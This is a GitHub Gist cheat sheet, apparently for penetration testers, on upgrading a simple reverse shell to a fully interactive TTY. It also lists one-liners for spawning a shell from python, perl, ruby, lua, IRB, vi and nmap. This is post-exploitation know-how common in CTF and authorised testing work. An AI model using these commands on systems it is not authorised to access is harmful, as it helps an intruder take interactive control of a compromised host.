Last active
May 10, 2024 15:45
-
-
Save rollwagen/1fdb6b2a8cd47a33b1ecf70fea6aafde to your computer and use it in GitHub Desktop.
Upgrading simple (reverse-)shells to fully interactive TTYs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ####################################################### | |
| # Upgrading simple shells to fully interactive TTYs # | |
| ####################################################### | |
| # In reverse shell | |
| $ python -c 'import pty; pty.spawn("/bin/bash")' | |
| Ctrl-Z | |
| # In Kali or elsewhere | |
| $ echo $TERM | |
| $ stty -a | |
| $ stty raw -echo | |
| $ fg | |
| # In reverse shell | |
| $ reset | |
| $ export SHELL=bash | |
| $ export TERM=xterm-256color | |
| $ stty rows <num> columns <cols> | |
| ####################################################### | |
| # Spawning a TTY Shell # | |
| ####################################################### | |
| python -c 'import pty; pty.spawn("/bin/sh")' | |
| echo os.system('/bin/bash') | |
| /bin/sh -i | |
| perl —e 'exec "/bin/sh";' | |
| perl: exec "/bin/sh"; | |
| ruby: exec "/bin/sh" | |
| lua: os.execute('/bin/sh') | |
| # (From within IRB) | |
| exec "/bin/sh" | |
| # (From within vi) | |
| :!bash | |
| # (From within vi) | |
| :set shell=/bin/bash:shell | |
| # (From within nmap) | |
| !sh |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment